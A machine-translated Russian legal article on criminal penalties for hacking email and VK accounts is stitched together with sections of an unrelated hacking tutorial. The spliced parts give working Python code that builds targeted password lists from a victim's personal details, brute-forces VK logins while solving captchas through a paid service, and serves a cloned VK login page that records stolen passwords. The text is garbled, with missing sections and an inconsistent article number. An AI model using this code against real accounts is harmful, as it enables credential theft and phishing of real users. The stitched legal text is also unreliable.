What responsibility do hackers bear for hacking a computer or VK page?

Modern life has already moved “with one foot” into virtual reality, which is tied to accounts on social networks, electronic means of communication, instant messengers and any other network resources. Such popularity creates the need for every user to seriously think about their information security and the safety of personal data/information, including because now many online resources have their own means of payment, the volume of which is quite impressive. This article will discuss what responsibility, and therefore punishment, awaits those responsible for hacking email and social networking accounts.

Types of penalties for hacking email and social networking accounts.

What do hackers hack?

One of the most common types of hacking in a computer environment is penetration into someone else's email , which all users usually have, since it is necessary to have it to register on websites and applications on a smartphone.

Access to it can also mean access to other resources of a citizen, which is why it so often becomes the subject of crime. The same applies to enterprise mail, which is common to all employees, and therefore easier prey for offenders.

Most often, someone else's email is hacked.

Sometimes this is done for the purpose of subsequent extortion of money if criminals have found some personal information of a citizen or gained access to company secrets.

Often, a consequence of email hacking is penetration into other people's social networks. By getting into the user's account, the attacker gains access to his personal life, photographs and information that he would like to leave undistributed.

Hacking websites or blogs is also very popular. This is done either for selfish purposes (blackmail), or to simply mock the site owner.

Email hacking

Having an email address is typical for every Internet user. E-mail, in addition to exchanging letters, is also necessary for registering on websites, working in applications, and so on.

Moreover, some users open multiple email accounts, and each of these addresses may contain personal information. It is this fact that attracts attackers to achieve selfish goals.

Concept and criminal legal characteristics

Attention! Hacking of email can be qualified under Article 138 or 272 of the Criminal Code of the Russian Federation, which involves establishing a crime with the following elements:

an object. In the first case, this is the right to maintain privacy of personal life, that is, constitutional foundations; in the second, it is the right to information,
objective side. According to Article 138, this is a violation of the integrity of an object, that is, an email address, by hacking; according to Article 272, it is illegal access to information that was subsequently copied, blocked or deleted,
subject. In the first and second cases, it is always a citizen who has reached the age of sixteen and has been declared sane,
subjective side. Also the same characteristic for Art. 138, and for Art. 272. Direct intent is provided.

Only if these signs are present can we talk about an act punishable under the Criminal Code of the Russian Federation.

Article for insulting a person on social networks and on the Internet.

Qualifying features

Computer crimes are varied but not common. The composition of such an act is formal in nature, that is, it is enough to start actions without waiting for negative consequences for a criminal coercive measure to be applied.

To determine the severity of the crime and punishment, you will need to determine the qualifying criteria. For example, if a work email was hacked, then the crime is committed using one’s official position, which can aggravate enforcement measures.

Methods of crime

Hacking email accounts seems to be a complex process. Do not think that if there is a password, then the system is protected. Attackers guess passwords last.

Other popular hacking methods are identified:

social engineering. This assumes that users will use simple passwords that are easily figured out by scammers. Such passwords include date of birth, name, pet name, and so on,
sending spam. Such letters are bright, positive, attract attention and contain malicious links, which ultimately allow you to gain access to information
phishing. This involves creating a fake website that copies the original 100%. An inattentive user simply enters personal data, transferring information voluntarily.

Virus software, also distributed via the Internet, is also often used.

Attention! Our qualified lawyers will assist you free of charge and around the clock on any issues. Find out more here.

Brief content of the article. 272 of the Criminal Code of the Russian Federation with comments

Responsibility for hacking is provided for under Art. 272 of the Criminal Code of the Russian Federation, consisting of 4 parts and 2 notes. The first part talks about those preventive measures that are prescribed for illegal access to computer information if this entails any changes or copying.

The first note defines the term computer information. This is information that is presented in the form of electrical signals, regardless of the type of storage or processing.

The following parts indicate the penalties that are imposed for this offense, taking into account the presence of certain aggravating circumstances:

in part 2 - when causing major damage (note No. 2 states that major damage starts from a million rubles ) or when committed for personal gain;
in part 3 - if the criminals were united in a whole group of people who planned the offense in advance, or if the person used his official position (having access to general email or special company information);
in part 4 - about the same crimes, but if they entailed serious consequences for the injured party or their threat.

What does judicial practice show under this article?

Responsibility for email hacking is criminal or administrative. Judicial practice under this article is extensive, since with the development of the Internet, criminals are increasingly encroaching on protected information for the sake of profit or use for criminal purposes.

Judicial practice in the case:

Citizen S. confessed to the police, where he admitted that he had repeatedly deleted or changed information from the computer network of an enterprise in the city of E. at the request of his manager N. S. was a software engineer and had the highest access to the network. At the request of V., who received bribes from higher authorities, he made changes for selfish purposes. The court found him guilty and sentenced him to arrest for a year. V. was also convicted with deprivation of the right to office and a fine.
Citizen E. was convicted under Art. 272 and 165 of the Criminal Code of the Russian Federation for illegal use of the Internet. According to the testimony of the victims, he paid for the use of the network to a certain A., who used the data of other victims V. and R., entering their logins and email passwords on E’s computer. The information was lost and it became public knowledge. A. was also sentenced to arrest.

Citizen M. was convicted under Art. 272, when, as a system administrator, she entered the password-protected email account of the accounting department and became familiar with the data on the company’s accounts. With this data, she blackmailed the director of the company, threatening to disclose it to the public and all employees of the enterprise. The director was forced to go to court for protection. M. was sentenced to a fine and imprisonment for a year, and was deprived of his position.

What decisions are most often made under Article 272?

Article 172 often results in convictions for account hacking. This is due to the fact that the guilt of the criminals is provable. It is extremely rare to come across accusations that cannot be proven. Criminals receive fines and forced labor. If their crime involves serious consequences or access to state secrets, then imprisonment is inevitable.

What is considered unauthorized access

According to Art. 272 of the Criminal Code of the Russian Federation, this term means illegally obtaining the opportunity to become familiar with information or use it.

Illegal access is the illegal use of someone else's information.

This is done using an algorithm of certain actions and using special technical and software tools that allow you to overcome security systems or use someone else’s passwords or codes. To do this, criminals can also disguise themselves as ordinary users using their passwords.

Attention! Also, unauthorized access is carried out by a person who does not have any rights to work with this information, for which special measures have been taken to limit the circle of people who have access to this information.

Such information, protected by the legislation of the Russian Federation, refers to objects of intellectual property, official and commercial secrets, personal data, etc.

Corpus delicti

We have analyzed what article is used for hacking a page on a social network or a website, but in order to qualify this offense as illegal access to computer information, it is necessary to determine whether the corpus delicti corresponds to it.

The objective side here is precisely the illegal access to information by a citizen who does not have any rights to it. The object of this offense is the security of computer information , and the subject is computer information.

The subjective side is a deliberate form of guilt in relation to the actions performed. In this case, a careless form is also allowed, but only if we are talking about the consequences that occurred as a result of the offense.

The subject of the crime is computer information.

In the latter case, criminal liability arises if the person knew about the possible results of the crime, but expected that something would prevent them from being realized. It is also provided for in cases where a citizen, although he did not expect their occurrence, should have and could have done so.

The subject of the crime is a capable person who has already reached the age of 16.

2) “Smart” search

A method designed for average users. For this we will need a special dictionary tailored for a specific person. Let's look at the structure of our dictionary:

Personal data. This includes date of birth (11/17/1992 = 1711, 1992, 17111992), age (1992, 2022 = 2022, 1992, 24), first name (Stas = stas, ctac) and last name (Ivanov = ivanov).
Accounts from other social networks networks and mail services (twitter.com/stasik_ku, facebook.com/stasss1992, = stasik_iv, stasss1992, stasss92).
Hobbies (football, swimming, youth = football, swimming, molodejka, molodegka).

There is also a VK page on which it is written what passwords should be specified, what characters are possible and the most common passwords. The result was a sheet of 14 lines. But from it we still need to create password combinations that our victim could create. I present to you my small python script that does just that.

#! coding:utf-8 import sys,os razdel = ['_',':',';'] def uniq(seq): seen = set() seen_add = seen.add return def brute_words(words): new_words = [ ] for i in words: new_words.append(i) new_words.append(i[0].upper() + i[1:]) new_words.append(i[0].upper() + i[1:-1 ] + i[-1].upper()) new_words.append(i.upper()) for j in spisok: new_words.append(i + j) for m in razdel: new_words.append(j + m + i) new_words.append(j + i) new_words.append(i * 2 + j) new_words.append(j * 2 + i) new_words.append(i[0].upper() + i[1:] + j) new_words .append(i[0].upper() + i[1:-1] + i[-1].upper() + j) return uniq(new_words) def generate(words_file): o = open(words_file, ' r') words = o.read().splitlines() for i in brute_words(words): print(i) def main(): try: argv1 = sys.argv[1] generate(argv1) except IndexError: print( "You must specify a file") except IOError: print("No such file") if __name__ == "__main__": main()

From 14 we got 1272 options. I'll give you a part.

Molodegkactac MolodegkActac molodejka_molodegka Stasss92molodejka stasss92molodegka molodegka_stasss92 molodegka:stasss92 molodegka;stasss92 stasss1992swimming swimming_stasss1992 Kurayginctac KuraygiNctac kurayginkuraygin kuraygin_kuray gin molodegka17111992 1711199217111992molodegka molodegkamolodegka17111992 24 1711_24

Great, now let’s automate the search for passwords through the mobile version of VKontakte with a small script.

#! coding: utf8 import grab, re, urllib2 from antigate import AntiGate from grab import GrabTimeoutError from time import sleep cap_key = '123 ' #Your Antigate key def anti(key, file): #Getting the Antigate Captcha solution try: try: data = AntiGate(key, file) return data except KeyboardInterrupt: print("Completion") except: anti(key, file) def save(url, file): #Downloading a file from URL site = urllib2.urlopen(url) f = open (file, 'wb') f.write(site.read()) def cap_solve(img): save(img, 'captcha.jpg') key = anti(cap_key, 'captcha.jpg') return key def brute( login, passwords, save): out = open(save, 'w') psswrds = open(passwords,'r') try: int(login) prefix = True except: prefix = False g = grab.Grab() g. go('https://m.vk.com') for line in psswrds: psswrd = line.rstrip('\r\n') g.doc.set_input('email', login) g.doc.set_input( 'pass', psswrd) g.doc.submit() if g.doc.text_search(u'captcha'): all_captchas = re.findall('"(/captcha.php[^"]*)"', g. response.body)[0] captcha = " + all_captchas key = cap_solve(captcha) g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.set_input('captcha_key ', str(key)) g.doc.submit() print("cap") if 'Submit' in g.response.body: if prefix: prefix1 = g.doc.rex_search('\+[0-9] *').group(0) prefix2 = g.doc.rex_search(' [0-9]*').group(0) pre1 = re.findall('[0-9]{1,}', prefix1) [0] pre2 = re.findall('[0-9]{1,}', prefix2)[0] login = login.replace(pre1, ") login = login.replace(pre2, ") g.set_input( 'code', login) g.submit() print(login + ':' + psswrd + '—success') out.write(login + ':' + psswrd + '\n') else: out.write(login + ':' + psswrd + '\n') else: if g.doc.rex_search('[^>]+').group(0) == 'Login | VK': print(login + ':' + psswrd + '—fail') else: print(login + ':' + psswrd + '—success') out.write(login + ':' + psswrd + '\n ') out.close() psswrds.close()

Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you’ll do that yourself if you’re interested. But the script itself is capable of entering the missing numbers into VKontakte protection when logging in from another country, and also, using Antigate, it can easily enter Captchas that appear after 5-6 attempts to enter from one IP.

How is guilt proven, on what basis can you file an application?

Hacking, according to the Criminal Code of the Russian Federation, is proven on the basis of specific facts, namely hacking of an email account, website or social network account.

It may also mean that personal data or trade secrets fall into the wrong hands, to people who do not have any rights to process or store them.

It is quite difficult to obtain such evidence, especially on the Internet, where it is very easy to remain anonymous. There are only a few options on how to get them:

send a letter to the managers of a postal service or social network with a request to provide a list of IP addresses used to log into them;
some social networks allow you to track the list of those who have access to your account;
If your name sends spam to your friends and family, but your profile is inaccessible, then most likely it has been hacked.

Hacking a social network account

Penetration of authorization on social networks is most often a consequence of hacking of mailboxes. In addition, users make many mistakes, which leads to disastrous consequences. Criminals fall into the hands of personal photographs, unwanted messages and details from life, and much more that they would like to hide from the eyes of prying eyes.

You need to know that at the moment it is much easier to hack a social network account than to bypass the protection of fairly well-known email services. Therefore, it is not enough to protect one thing; a set of measures is necessary. The best defense is prevention and vigilance.

Concept and qualifying characteristics

Since the essence of the crime of hacking a mailbox and a social network account is almost the same, their criminal legal characteristics are the same. In the modern world, even a business can be organized through a social network, so it cannot be said that hacking one or another object will be more important than another.

Hacking of social networking accounts is also subject to the formality of a crime. Let's note something important - hacking is often a consequence of the user's banal inattention; leaving an open profile in an Internet cafe or at a friend's house, it will be difficult to tell you about the criminal element of the crime.

Methods of crime

You can add to the above methods of obtaining a password:

Unclosed sessions on social media Networks;
Transfer of data to third parties;
Using unverified Wifi networks.

Liability for unauthorized access

Certain preventive measures are prescribed under various parts of this article. In this section we will find out which ones and for which part of Art. 272 of the Criminal Code of the Russian Federation they are determined.

If the offense was classified under Part 1, then the following penalties may be imposed:

a fine of 200,000 rubles or 1.5 years’ salary;
corrective labor for a year;
restriction of a person’s movements for 2 years;
forced labor for the same period;
imprisonment for the same period of time.

Under Part 2, penalties may be as follows:

a fine in the amount of 100,000 to 300,000 rubles or wages for 1-2 years;
correctional labor for 1-2 years;
restriction of movement for 4 years;
forced labor for the same period;
imprisonment in a colony for the same period.

If the court has determined that the crime is committed under Part 3 of Art. 272 of the Criminal Code of the Russian Federation, then more serious sanctions may be used:

a fine of up to 500,000 rubles or wages for 3 years with the introduction of a ban on holding certain positions or certain types of activities for a period of up to 3 years;
restriction of a citizen’s movements for 4 years;
forced labor for 5 years;
imprisonment for the same period of time.

Part 4 provides for only one type of punishment - imprisonment for a period of up to 7 years.

Additional Responsibility

Depending on the circumstances of the incident, other articles of the Criminal Code of the Russian Federation may be applied. For example, if a criminal used viruses or other malicious programs to harm other users, then Art. 273 of the Criminal Code of the Russian Federation.

In cases where a criminal has gained access to the personal data of citizens or their correspondence, Art. 137 and 138 of the Criminal Code of the Russian Federation.

When assigning a preventive measure, all circumstances of the case are taken into account.

Also, when publishing any information, the criminal could cause hostility or hatred among users. In this case, Art. 282 of the Criminal Code of the Russian Federation. If he tried to slander another citizen, then Art. 128.1 of the Criminal Code of the Russian Federation.

Examples from judicial practice

The student hacked the email of another citizen, after which he began to extort money from him, threatening to disseminate his personal data. He was found by law enforcement officers, and his actions were qualified under two articles: 272 and 138 of the Criminal Code of the Russian Federation. He was sentenced to 7 years in prison.

An employee of a company providing communication services downloaded a list of calls from another citizen for personal purposes. Since she had no criminal record, reconciliation of the parties was used.

An employee of one organization destroyed, on his own initiative, certain information that discredited his name. His actions were determined under Part 3 of Art. 272 of the Criminal Code of the Russian Federation.

Punishment and responsibility

For convenience, we will use the table and consider the types of punishment for hacking a social account. networks or mail:

Type of punishment	Article 138 of the Criminal Code of the Russian Federation	Article 272 of the Criminal Code of the Russian Federation
Fine	100-300 thousand rubles	Up to 500 thousand rubles
Mandatory work	Up to 480 hours	Not assigned
Correctional work	Up to a year	Up to a year
Forced labor	Up to four years	Up to 5 years
Arrest	Up to four months	Not assigned
Restriction of freedom	Not assigned	Up to four years
Deprivation of liberty	Up to four years	Up to seven years

The following video will tell you in detail what kind of responsibility awaits an attacker for hacking an account on a social network:

What to do if you receive a ransom letter from hackers

Sometimes the hackers themselves may write to you. Allegedly, they got into your account, infected your computer with terrible malware, recorded incriminating evidence on your webcam, copied correspondence, and so on. The attackers threaten to publish the collected data and demand a ransom.

In fact, most likely, no one has hacked you, and the scammers simply send the extortion letter to all addresses from some spam database. If you want to play it safe, you can still change the password for the account that was allegedly hacked - doing this from time to time is in any case useful. Again, if you are afraid of forgetting your new password, install Kaspersky Password Manager, it will remember everything for you.

Why do emails and accounts get hacked?

Why do they do this? The answer is simple: attackers steal other people's pages and mailboxes solely to make money. Initially, the mail is examined by hackers for the presence of any valuable information, passwords from payment systems and other important data. After the account is cleaned, it is either used for mass distribution of advertising (so-called spam), or put up for sale, where it will most likely be bought by the same spammer advertisers.

Remember: if you cannot enter your password several times in a row, but you are absolutely sure that it is correct: sound the alarm. Most likely, your mailbox has been hacked.

What to do if you receive a notification from the service about suspicious activity

Many Internet services warn users about important actions with their accounts. They send notifications when you (or not you) change your password, associate a new phone or email address with your account, or log in from a new device or from an unfamiliar location. If you received such a letter and you did nothing, this is a cause for concern.

Try logging into your account. Just don’t click on the links from the notification: in addition to real letters from services, quite often you receive fake messages about suspicious activity in your account from scammers who are hunting for credentials. It's better to enter the address manually in the browser - or open the application.
Check your login history: if there are unfamiliar devices or places in the list, log out everyone except yourself.
Check your details: email, phone, security question. If the attackers managed to change something, correct it.
Change your password. It must be reliable and different from the old one. If you are afraid of forgetting it, a password manager will help.
Change passwords wherever you used the same secret combination, as well as in accounts linked to the affected account (for example, in online stores where you logged in through a hacked social network account).

How to avoid becoming a victim of burglars

Of course, it’s best when scammers simply don’t get into your accounts. Therefore, even if you have not been hacked, make sure that your accounts are properly protected:

Use strong and unique passwords.
Enable two-factor authentication.
Install a reliable security solution on all your devices that will not only catch malware, but also warn you if credentials from some service have leaked onto the Internet.

3) “Fake is our everything”

A method aimed at inattentive users. For the most part, they are either lured with freebies or distracted with the help of many letters. I'll show you how to create a simple fake based on a regular VK website (login page). You can take both the mobile and the main versions, it depends on what device your target will be logging in from. Well, let's get started. First of all, download the VK login page through your browser. Then change the encoding of the html file to utf-8. First we define the encoding

file --mime-encoding file.html

Then we change from the original to the new one

iconv -f iso-8859-1 -t utf-8 file.html > vk2.html

Next, you need to create a page control in a server-side language.

@route('/') def index(): return template('vk2.html') @route('/Welcome! | VK_files/') def server_static(filepath): return static_file(filepath, root='./Welcome ! | VK_files/')

As it turned out, some files sometimes display a 404 error. Unfortunately, we don’t have the necessary images from the site, so we’ll put them in a separate images folder.

mkdir images cd images wget wget "" wget "" mkdir icons cd icons wget "" wget ""

Let's write a new routing in the script.

@route('/images/') def server_static(filepath): return static_file(filepath, root='./images/')

Great. Of course, in an amicable way, it would also be necessary to download the main pages, which you can go to from the main one without logging in, to make it more believable (and then change the links in the main one), but for a start this will be enough. Let's add routing for the post request. Let's find the login form on the page. Let's change the action in its code to empty and remove the onsubmit check. And let's add post request processing.

@post('/') def index(): login = request.forms.get('email') password = request.forms.get('pass') print("|Catch|————— " + login + ':' + password) with open("log.txt", "a") as myfile: myfile.write(login + ':' + password + "\n") return redirect('https://www. vk.com')

In conclusion, we move the button tag that is under the form in the code into the form and add the type="submit" property and enjoy the fact that everything works. For those who did not succeed, we present an archive with a ready-made solution.

If you want to optimize this process and don’t want to write it all out manually, you can use the SET tool. (Social Engineer Toolkit).